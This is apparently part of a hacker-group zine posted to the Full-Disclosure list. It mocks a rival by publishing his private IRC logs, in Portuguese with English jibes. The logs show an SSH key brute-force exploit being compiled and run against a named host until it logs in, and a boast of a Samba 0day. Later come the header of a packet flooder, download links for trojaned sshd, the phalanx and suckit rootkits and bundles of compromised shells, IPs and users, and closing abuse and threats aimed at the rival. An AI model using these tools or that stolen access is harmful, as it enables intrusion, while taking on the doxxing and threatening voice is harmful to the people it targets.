-> PRIVMSG skotch :vou te desblokear ->>>>>>>>> i'll unblock ya from msn babe! plz come back !
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :to indo pro trampo
-> PRIVMSG skotch :vai para com a putaria de merda ?
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de
nada
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
-> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org -l xxxxx -d keys/ ->>>>>>> w0w, this is certainly
a 0day, right ? /me rolling on the floor laughing
-> PRIVMSG skotch : * [!] KEY FOUND!
-> PRIVMSG skotch : * [!] Logging in...
-> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx
-> PRIVMSG skotch : * xxxxx () digitaljunk ~ $
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows
-> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :procura se informar primeiro antes de falar merda
-> PRIVMSG skotch :so joguei verde
-> PRIVMSG skotch :sou noiado
-> PRIVMSG skotch :vc tb he
-> PRIVMSG skotch :normal
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh
-> PRIVMSG skotch :nao fiz mal nenhum pra vc
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :pode demorar horas pra achar a key certa
-> PRIVMSG skotch :nao
-> PRIVMSG skotch :de 5 a 10 min
-> PRIVMSG skotch :o coideloko ja ta melhorando ele
-> PRIVMSG skotch :pra demorar menos
-> PRIVMSG skotch :hehe
-> PRIVMSG skotch :a oi ta bugada
-> PRIVMSG skotch :ele FUNCIONA
-> PRIVMSG skotch :e jaja
-> PRIVMSG skotch :to com 0day pra samba
-> PRIVMSG skotch :aguarde
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :so falo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :pra vc fica esperto
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q tem gringo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :te sniffando
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :pq fikei sabendo
-> PRIVMSG skotch :ta loko ?
-> PRIVMSG skotch :so se for na bnc
-> PRIVMSG skotch :hehehe
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :nego q ta falando com vc
-> PRIVMSG skotch :ateh entao nao ligo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :soh pra causar intriga
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu eh meu amigo ou nao eh :?
-> PRIVMSG skotch :<skotch> so falo
-> PRIVMSG skotch :<skotch> pra vc fica esperto
-> PRIVMSG skotch :<skotch> q tem gringo
-> PRIVMSG skotch :<skotch> te sniffando
-> PRIVMSG skotch :<skotch> pq fikei sabendo
-> PRIVMSG skotch :qm sniffando ?
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :fala krl
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :skotch
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :to comend mermao
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :e to atrasado pro trampo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :flw
-> PRIVMSG skotch :cara
-> PRIVMSG skotch :se tu continuar folgado
-> PRIVMSG skotch :naovaidar
-> PRIVMSG skotch :vai sew fude
-> PRIVMSG skotch :fala direito
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo
de vc
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :ultimamente
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :e n trocava ideia antes
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :so vc pensar
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :vc
-> PRIVMSG skotch :e o thomaz
-> PRIVMSG skotch :sao os unicos
-> PRIVMSG skotch :q tem as m erda q tenho
-> PRIVMSG skotch :UNICOS
-> PRIVMSG skotch :mais ngm tem
-> PRIVMSG skotch :nao confio em m ais NGM
-> PRIVMSG skotch :eu acho q tu deveria me falar qm eh
-> PRIVMSG skotch :so isso
-> PRIVMSG skotch :e troquei de bnc ontemrs
-> PRIVMSG skotch :e troquei de bnc ontem rs ->>>>>> i changed my bnc yesterday! (we're glad)
-> PRIVMSG rip :skotch said to me that are sniffing me
-> PRIVMSG rip :but skotch dont know about nothing ->>>>>> as always, backstabbing hiZ
boyfriend(skotch)
/*
* Geminid IIb. TCP/UDP/ICMP Packet flooder
*
* What can i say? Enjoy! :)
* gr33tz: PoWerPr0 and godmode0
*
thanks for the gem source by the way!
there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do
anyway, if we get something else in the future, we will publish again. thanks buddies.
random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log
##########################################################################
# __ __ __ __ #
#.----.| |--.---.-.-----.| |_.-----.----. | |_| |--.----.-----.-----.#
#| __|| | _ | _ || _| -__| _| | _| | _| -__| -__|#
#|____||__|__|___._| __||____|_____|__| |____|__|__|__| |_____|_____|#
# |__| #
# #
# - download links #
##########################################################################
<><> thiZ iZ ZeRIouZ buZInEzZ dewD!
<><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some
random ones]
<><> please guyZ, make it priv8 ! (/me rolleyes :B)
- kool&klean chapter.
##########################################################################
# _ _ ___ #
# ___ | |_ ___ ___ _| |_ ___ _ _ | | '___ _ _ _ _ #
# / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_> #
# \_|_.|_|_|<___|| _/ |_| \___.|_| |_| \___/`___||_| #
# |_| #
# #
# - conclusion #
##########################################################################
----------------- reflection time
.......... whats the point of all this ? prove that you are better than someone ?
......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47.
........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ?
....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit.
...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you.
..... why would someone send you a mail? nobody cares about you, dipshit.
.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha
what a joke
... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while
you can.
.. a kiss to zmda
. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do.
just to finish:
******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************
;
;
; _____ __ _______
;| |_.---.-.| |--.| __|.-----.----.
;| | _ || _ ||__ || -__| __|
;|_______|___._||_____||_______||_____|____|
;
; _______ __ __ __
;|_ _|.-----.--| |.--.--.-----.| |_.----.|__|.-----.-----.
; _| |_ | | _ || | |__ --|| _| _|| || -__|__ --|
;|_______||__|__|_____||_____|_____||____|__| |__||_____|_____|
; ;
;
; #LABSEC @ EFNET - closed to friends, of course.
;
; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek
;
; lAmE ZiNE wRitTeN bY:
;
; klux - spoof1 @RR0B@ gmail.com - hAppY flOodiNg
;
;
; wE iZ watCHiNg U
******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
